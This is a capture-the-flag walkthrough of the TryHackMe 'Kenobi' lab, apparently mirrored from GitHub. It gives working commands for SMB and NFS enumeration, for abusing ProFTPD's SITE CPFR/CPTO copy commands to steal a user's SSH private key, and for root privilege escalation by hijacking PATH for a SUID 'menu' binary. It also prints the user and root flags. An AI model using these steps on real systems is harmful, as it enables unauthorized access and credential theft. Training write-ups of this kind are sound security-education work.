mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
330 lines
11 KiB
Markdown
330 lines
11 KiB
Markdown
|
# TryHackMe-Kenobi
|
||
|
|
||
|
> Abdullah Rizwan | 09:57 PM
|
||
|
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.93.137
|
||
|
Host is up (0.17s latency).
|
||
|
Not shown: 993 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
21/tcp open ftp ProFTPD 1.3.5
|
||
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|
||
|
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|
||
|
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||
|
| http-robots.txt: 1 disallowed entry
|
||
|
|_/admin.html
|
||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||
|
|_http-title: Site doesn't have a title (text/html).
|
||
|
111/tcp open rpcbind 2-4 (RPC #100000)
|
||
|
| rpcinfo:
|
||
|
| program version port/proto service
|
||
|
| 100000 2,3,4 111/tcp rpcbind
|
||
|
| 100000 2,3,4 111/udp rpcbind
|
||
|
| 100000 3,4 111/tcp6 rpcbind
|
||
|
| 100000 3,4 111/udp6 rpcbind
|
||
|
| 100003 2,3,4 2049/tcp nfs
|
||
|
| 100003 2,3,4 2049/tcp6 nfs
|
||
|
| 100003 2,3,4 2049/udp nfs
|
||
|
| 100003 2,3,4 2049/udp6 nfs
|
||
|
| 100005 1,2,3 40755/tcp mountd
|
||
|
| 100005 1,2,3 43479/udp6 mountd
|
||
|
| 100005 1,2,3 52935/tcp6 mountd
|
||
|
| 100005 1,2,3 60855/udp mountd
|
||
|
| 100021 1,3,4 36153/tcp nlockmgr
|
||
|
| 100021 1,3,4 38263/tcp6 nlockmgr
|
||
|
| 100021 1,3,4 45056/udp nlockmgr
|
||
|
100021 1,3,4 36153/tcp nlockmgr [3/35]
|
||
|
| 100021 1,3,4 38263/tcp6 nlockmgr
|
||
|
| 100021 1,3,4 45056/udp nlockmgr
|
||
|
| 100021 1,3,4 45196/udp6 nlockmgr
|
||
|
| 100227 2,3 2049/tcp nfs_acl
|
||
|
| 100227 2,3 2049/tcp6 nfs_acl
|
||
|
| 100227 2,3 2049/udp nfs_acl
|
||
|
|_ 100227 2,3 2049/udp6 nfs_acl
|
||
|
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|
||
|
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
|
||
|
2049/tcp open nfs_acl 2-3 (RPC #100227)
|
||
|
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Host script results:
|
||
|
|_clock-skew: mean: 1h39m59s, deviation: 2h53m13s, median: -1s
|
||
|
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|
||
|
| smb-os-discovery:
|
||
|
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|
||
|
| Computer name: kenobi
|
||
|
| NetBIOS computer name: KENOBI\x00
|
||
|
| Domain name: \x00
|
||
|
| FQDN: kenobi
|
||
|
|_ System time: 2020-10-04T11:58:20-05:00
|
||
|
| smb-security-mode:
|
||
|
| account_used: guest
|
||
|
| authentication_level: user
|
||
|
| challenge_response: supported
|
||
|
|_ message_signing: disabled (dangerous, but default)
|
||
|
| smb2-security-mode:
|
||
|
| 2.02:
|
||
|
|_ Message signing enabled but not required
|
||
|
| smb2-time:
|
||
|
| date: 2020-10-04T16:58:19
|
||
|
|_ start_date: N/A
|
||
|
|
||
|
|
||
|
```
|
||
|
|
||
|
|
||
|
## SMB
|
||
|
|
||
|
We know that port 139 and 445 is open so we can try using `smbclient`
|
||
|
|
||
|
```
|
||
|
smbclient -L \\\\10.10.93.137\\
|
||
|
Enter WORKGROUP\root's password:
|
||
|
|
||
|
Sharename Type Comment
|
||
|
--------- ---- -------
|
||
|
print$ Disk Printer Drivers
|
||
|
anonymous Disk
|
||
|
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
|
||
|
SMB1 disabled -- no workgroup available
|
||
|
root@kali:~/TryHackMe/Easy/Kenobi# smbclient \\\\10.10.93.137\\anonymous
|
||
|
Enter WORKGROUP\root's password:
|
||
|
Try "help" to get a list of possible commands.
|
||
|
smb: \> ls
|
||
|
. D 0 Wed Sep 4 15:49:09 2019
|
||
|
.. D 0 Wed Sep 4 15:56:07 2019
|
||
|
log.txt N 12237 Wed Sep 4 15:49:09 2019
|
||
|
|
||
|
|
||
|
9204224 blocks of size 1024. 6876284 blocks available
|
||
|
```
|
||
|
We'll `log.txt` so to get it locally `get log.txt`
|
||
|
|
||
|
## Rpc Bind PORT 111
|
||
|
|
||
|
`nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.93.137`
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.93.137
|
||
|
Host is up (0.18s latency).
|
||
|
|
||
|
PORT STATE SERVICE
|
||
|
111/tcp open rpcbind
|
||
|
| nfs-ls: Volume /var
|
||
|
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
|
||
|
| PERMISSION UID GID SIZE TIME FILENAME
|
||
|
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
|
||
|
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
|
||
|
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
|
||
|
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
|
||
|
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
|
||
|
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
|
||
|
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
|
||
|
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
|
||
|
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
|
||
|
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|
||
|
|_
|
||
|
| nfs-showmount:
|
||
|
|_ /var *
|
||
|
| nfs-statfs:
|
||
|
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|
||
|
|_ /var 9204224.0 1839224.0 6874404.0 22% 16.0T 32000
|
||
|
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 7.11 seconds
|
||
|
|
||
|
```
|
||
|
|
||
|
## FTP PORT 21
|
||
|
|
||
|
`nc 10.10.93.137 21`
|
||
|
|
||
|
```
|
||
|
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.137]
|
||
|
```
|
||
|
Now we can copy the contents from and to , see we know from the `log.txt` that there is an ssh key for user `kenobi` so we can copy it to mnt share which is `var`.
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Kenobi# nc 10.10.93.137 21
|
||
|
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.137]
|
||
|
SITE CFPR /home/kenobi/.ssh/id_rsa
|
||
|
500 'SITE CFPR' not understood
|
||
|
SITE CPFR /home/kenobi/.ssh/id_rsa
|
||
|
350 File or directory exists, ready for destination name
|
||
|
SITE CPTO /var/tmp/id_rsa
|
||
|
250 Copy successful
|
||
|
```
|
||
|
|
||
|
Now we need to mount it to our system in system directory `/mnt`
|
||
|
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Kenobi# mkdir /mnt/kenobiNFS
|
||
|
root@kali:~/TryHackMe/Easy/Kenobi# mount 10.10.93.137:/var /mnt/kenobiNFS
|
||
|
root@kali:~/TryHackMe/Easy/Kenobi# cd /mnt
|
||
|
root@kali:/mnt# ls -la
|
||
|
total 12
|
||
|
drwxr-xr-x 3 root root 4096 Oct 4 22:15 .
|
||
|
drwxr-xr-x 18 root root 4096 Aug 28 06:07 ..
|
||
|
drwxr-xr-x 14 root root 4096 Sep 4 2019 kenobiNFS
|
||
|
root@kali:/mnt# cd Ke
|
||
|
-bash: cd: Ke: No such file or directory
|
||
|
root@kali:/mnt# cd kenobiNFS/
|
||
|
root@kali:/mnt/kenobiNFS# ls -la
|
||
|
total 56
|
||
|
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
|
||
|
drwxr-xr-x 3 root root 4096 Oct 4 22:15 ..
|
||
|
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
|
||
|
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
|
||
|
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
|
||
|
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
|
||
|
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
|
||
|
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
|
||
|
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
|
||
|
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
|
||
|
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
|
||
|
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
|
||
|
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
|
||
|
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
|
||
|
drwxrwxrwt 6 root root 4096 Oct 4 22:13 tmp
|
||
|
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
|
||
|
|
||
|
```
|
||
|
|
||
|
Now to unmount use
|
||
|
|
||
|
`umount /mnt/kenobiNFS`
|
||
|
|
||
|
## SSH PORT 22
|
||
|
|
||
|
Now that we have the private key , change it's permissions to default `chmod 600 id_rsa` and log in
|
||
|
|
||
|
```
|
||
|
ssh kenobi@10.10.93.137 -i id_rsa
|
||
|
```
|
||
|
|
||
|
User flag : `d0b0f3f53b6caa532a83915e19224899`
|
||
|
|
||
|
## Privilege Escalation
|
||
|
|
||
|
|
||
|
Looking Set User Id (SUID)
|
||
|
|
||
|
#### Running on Attacker Machine
|
||
|
```
|
||
|
find / -perm -u=s -type f 2>/dev/null
|
||
|
/usr/libexec/polkit-agent-helper-1
|
||
|
/usr/bin/passwd
|
||
|
/usr/bin/gpasswd
|
||
|
/usr/bin/su
|
||
|
/usr/bin/fusermount3
|
||
|
/usr/bin/kismet_cap_ti_cc_2531
|
||
|
/usr/bin/kismet_cap_ti_cc_2540
|
||
|
/usr/bin/mount
|
||
|
/usr/bin/bwrap
|
||
|
/usr/bin/chfn
|
||
|
/usr/bin/kismet_cap_nrf_mousejack
|
||
|
/usr/bin/pkexec
|
||
|
/usr/bin/kismet_cap_linux_bluetooth
|
||
|
/usr/bin/kismet_cap_linux_wifi
|
||
|
/usr/bin/chsh
|
||
|
/usr/bin/kismet_cap_nrf_51822
|
||
|
/usr/bin/kismet_cap_nxp_kw41z
|
||
|
/usr/bin/newgrp
|
||
|
/usr/bin/ntfs-3g
|
||
|
/usr/bin/umount
|
||
|
/usr/bin/sudo
|
||
|
/usr/sbin/mount.cifs
|
||
|
/usr/sbin/mount.nfs
|
||
|
/usr/sbin/pppd
|
||
|
/usr/lib/xorg/Xorg.wrap
|
||
|
/usr/lib/openssh/ssh-keysign
|
||
|
/usr/lib/virtualbox/VBoxNetAdpCtl
|
||
|
/usr/lib/virtualbox/VBoxNetDHCP
|
||
|
/usr/lib/virtualbox/VBoxHeadless
|
||
|
/usr/lib/virtualbox/VBoxNetNAT
|
||
|
/usr/lib/virtualbox/VBoxVolInfo
|
||
|
/usr/lib/virtualbox/VirtualBoxVM
|
||
|
/usr/lib/virtualbox/VBoxSDL
|
||
|
/usr/lib/chromium/chrome-sandbox
|
||
|
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
|
||
|
/usr/share/discord/chrome-sandbox
|
||
|
/usr/share/code/chrome-sandbox
|
||
|
|
||
|
```
|
||
|
|
||
|
#### Running on Target Machine
|
||
|
```
|
||
|
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
|
||
|
/sbin/mount.nfs
|
||
|
/usr/lib/policykit-1/polkit-agent-helper-1
|
||
|
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
|
||
|
/usr/lib/snapd/snap-confine
|
||
|
/usr/lib/eject/dmcrypt-get-device
|
||
|
/usr/lib/openssh/ssh-keysign
|
||
|
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
|
||
|
/usr/bin/chfn
|
||
|
/usr/bin/newgidmap
|
||
|
/usr/bin/pkexec
|
||
|
/usr/bin/passwd
|
||
|
/usr/bin/newuidmap
|
||
|
/usr/bin/gpasswd
|
||
|
/usr/bin/menu
|
||
|
/usr/bin/sudo
|
||
|
/usr/bin/chsh
|
||
|
/usr/bin/at
|
||
|
/usr/bin/newgrp
|
||
|
/bin/umount
|
||
|
/bin/fusermount
|
||
|
/bin/mount
|
||
|
/bin/ping
|
||
|
/bin/su
|
||
|
/bin/ping6
|
||
|
```
|
||
|
We can see the difference that `/usr/bin/menu` stands very odd
|
||
|
|
||
|
|
||
|
Running the binary we can see `3` options
|
||
|
|
||
|
```
|
||
|
kenobi@kenobi:~$ /usr/bin/menu
|
||
|
|
||
|
***************************************
|
||
|
1. status check
|
||
|
2. kernel version
|
||
|
3. ifconfig
|
||
|
** Enter your choice :
|
||
|
```
|
||
|
|
||
|
```
|
||
|
kenobi@kenobi:/tmp$ echo /bin/sh > curl
|
||
|
kenobi@kenobi:/tmp$ chmod 777
|
||
|
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
|
||
|
kenobi@kenobi:/tmp$ echo $IP
|
||
|
|
||
|
kenobi@kenobi:/tmp$ echo $PATH
|
||
|
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
|
||
|
kenobi@kenobi:/tmp$ /usr/bin/menu
|
||
|
|
||
|
***************************************
|
||
|
1. status check
|
||
|
2. kernel version
|
||
|
3. ifconfig
|
||
|
** Enter your choice :1
|
||
|
# bash
|
||
|
To run a command as administrator (user "root"), use "sudo <command>".
|
||
|
See "man sudo_root" for details.
|
||
|
|
||
|
root@kenobi:/tmp# whoami
|
||
|
root
|
||
|
root@kenobi:/tmp# id
|
||
|
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
|
||
|
root@kenobi:/tmp#
|
||
|
|
||
|
```
|
||
|
|
||
|
Root flag `177b3cd8562289f37382721c28381f02`
|